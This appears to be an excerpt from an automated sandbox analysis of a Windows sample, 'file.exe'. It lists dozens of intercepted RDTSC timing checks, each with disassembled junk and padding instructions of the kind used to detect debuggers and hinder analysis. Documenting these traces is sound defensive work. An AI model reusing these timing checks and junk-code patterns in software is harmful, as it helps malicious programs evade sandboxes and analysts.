              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADE848 second address: ADE863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDE8CE8B4CFh 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9168 second address: AE9184 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9184 second address: AE9188 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE92F6 second address: AE92FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE96D6 second address: AE96DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE96DC second address: AE96EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FDE8C51D4DEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE982E second address: AE9832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9832 second address: AE985D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E3h 0x00000007 jmp 00007FDE8C51D4E4h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE985D second address: AE9871 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnl 00007FDE8CE8B4C6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c jl 00007FDE8CE8B4CCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9871 second address: AE98F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FDE8C51D4DCh 0x0000000c pushad 0x0000000d jmp 00007FDE8C51D4E5h 0x00000012 jmp 00007FDE8C51D4E2h 0x00000017 popad 0x00000018 push esi 0x00000019 jmp 00007FDE8C51D4E0h 0x0000001e jmp 00007FDE8C51D4E9h 0x00000023 pop esi 0x00000024 pushad 0x00000025 js 00007FDE8C51D4D6h 0x0000002b push eax 0x0000002c pop eax 0x0000002d jmp 00007FDE8C51D4E4h 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF23C0 second address: AF23D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007FDE8CE8B4C6h 0x0000000d jmp 00007FDE8CE8B4CAh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF0657 second address: AF065B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF065B second address: AF068A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDE8CE8B4D2h 0x0000000b jmp 00007FDE8CE8B4CDh 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007FDE8CE8B4C6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF068A second address: AF068E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF1073 second address: AF1087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pop esi 0x00000008 jbe 00007FDE8CE8B4EDh 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF1087 second address: AF108B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF11F4 second address: AF11FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF137E second address: AF13C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007FDE8C51D4E7h 0x0000000d pushad 0x0000000e popad 0x0000000f jnc 00007FDE8C51D4D6h 0x00000015 push esi 0x00000016 pop esi 0x00000017 popad 0x00000018 pushad 0x00000019 jmp 00007FDE8C51D4DCh 0x0000001e jo 00007FDE8C51D4D6h 0x00000024 je 00007FDE8C51D4D6h 0x0000002a popad 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF89A8 second address: AF89AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF8370 second address: AF8374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF8374 second address: AF83B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4CEh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FDE8CE8B4CCh 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007FDE8CE8B4CEh 0x00000018 jl 00007FDE8CE8B4C6h 0x0000001e pushad 0x0000001f popad 0x00000020 pushad 0x00000021 jmp 00007FDE8CE8B4CCh 0x00000026 push ebx 0x00000027 pop ebx 0x00000028 popad 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF852E second address: AF8552 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007FDE8C51D4D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDE8C51D4E6h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B059F4 second address: B059F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B05B91 second address: B05BB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jnl 00007FDE8C51D4D6h 0x0000000e jmp 00007FDE8C51D4E6h 0x00000013 push edx 0x00000014 pop edx 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B05BB8 second address: B05BC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B05BC0 second address: B05BFC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDE8C51D4D6h 0x00000008 jbe 00007FDE8C51D4D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 ja 00007FDE8C51D4E2h 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 push edi 0x0000001a push eax 0x0000001b pop eax 0x0000001c pop edi 0x0000001d jmp 00007FDE8C51D4DAh 0x00000022 push edx 0x00000023 jng 00007FDE8C51D4D6h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0A09B second address: B0A0A4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0A0A4 second address: B0A0AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FDE8C51D4D6h 0x0000000a pop edi 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0A0AF second address: B0A0BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 push esi 0x00000008 pop esi 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B09C80 second address: B09C87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B09DB6 second address: B09DD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4D7h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1B485 second address: B1B48B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1B48B second address: B1B48F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1B48F second address: B1B493 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1B493 second address: B1B499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1B499 second address: B1B4B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E7h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1B4B6 second address: B1B4BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1B4BA second address: B1B4C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B21AC6 second address: B21ACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B202E8 second address: B202EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B205D8 second address: B205DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B205DC second address: B205F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jne 00007FDE8C51D4D6h 0x0000000d js 00007FDE8C51D4D6h 0x00000013 pop esi 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B20A5B second address: B20A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B20BAF second address: B20BBB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 je 00007FDE8C51D4D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B24254 second address: B24258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B32907 second address: B3291C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3291C second address: B32922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B32922 second address: B3293B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 jl 00007FDE8C51D4DCh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B41767 second address: B4176F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4176F second address: B41773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43013 second address: B43018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43018 second address: B43046 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jbe 00007FDE8C51D4D6h 0x00000009 jmp 00007FDE8C51D4DBh 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FDE8C51D4E5h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B42EEF second address: B42EF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B448A6 second address: B448B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push esi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B448B0 second address: B448B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B448B6 second address: B448D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE8C51D4E1h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B45EBF second address: B45EC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B45EC3 second address: B45EC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B45EC7 second address: B45ED7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FDE8CE8B4D2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B47E3A second address: B47E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B47E3E second address: B47E71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FDE8CE8B4D8h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B47E71 second address: B47E9A instructions: 0x00000000 rdtsc 0x00000002 ja 00007FDE8C51D4D8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007FDE8C51D4F3h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FDE8C51D4E3h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B61352 second address: B61358 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B61358 second address: B6136C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FDE8C51D4DCh 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B60875 second address: B60894 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FDE8CE8B4D0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jbe 00007FDE8CE8B4C6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B60894 second address: B608AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FDE8C51D4D6h 0x0000000a popad 0x0000000b push ebx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e js 00007FDE8C51D4D6h 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B608AD second address: B608B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B608B1 second address: B608B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B608B5 second address: B608BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B60B7B second address: B60B8E instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDE8C51D4DCh 0x00000008 jp 00007FDE8C51D4D6h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B60F54 second address: B60F5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B60F5A second address: B60F62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6108B second address: B61091 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B629CF second address: B629DB instructions: 0x00000000 rdtsc 0x00000002 js 00007FDE8C51D4DEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6538D second address: B65397 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDE8CE8B4CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6564C second address: B65650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B65650 second address: B656A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FDE8CE8B4CDh 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007FDE8CE8B4C8h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a mov dword ptr [ebp+1244EF50h], edi 0x00000030 push 00000004h 0x00000032 mov dh, 40h 0x00000034 mov dh, bh 0x00000036 call 00007FDE8CE8B4C9h 0x0000003b push edi 0x0000003c push eax 0x0000003d push edx 0x0000003e push edx 0x0000003f pop edx 0x00000040 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B656A7 second address: B656AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B656AB second address: B656DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jmp 00007FDE8CE8B4CFh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007FDE8CE8B4D1h 0x00000019 push esi 0x0000001a pop esi 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B656DD second address: B6570D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007FDE8C51D4DFh 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FDE8C51D4E1h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B67360 second address: B67364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B66E31 second address: B66E49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FDE8C51D4D6h 0x0000000a jmp 00007FDE8C51D4DCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B66E49 second address: B66E4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B66E4E second address: B66E92 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FDE8C51D4DCh 0x00000008 jno 00007FDE8C51D4EEh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007FDE8C51D4E8h 0x00000018 jmp 00007FDE8C51D4DCh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B66E92 second address: B66E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop edi 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B68D6C second address: B68D76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FDE8C51D4D6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B68D76 second address: B68D80 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDE8CE8B4C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B68D80 second address: B68D90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FDE8C51D4D6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B68D90 second address: B68D94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B68D94 second address: B68DB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jmp 00007FDE8C51D4DBh 0x00000010 pop edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push edx 0x00000015 pop edx 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B68DB1 second address: B68DBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7E4CB second address: A7E4F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FDE8C51D4E7h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007FDE8C51D4D6h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7E68D second address: A7E6AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDE8CE8B4D8h 0x0000000f rdtsc
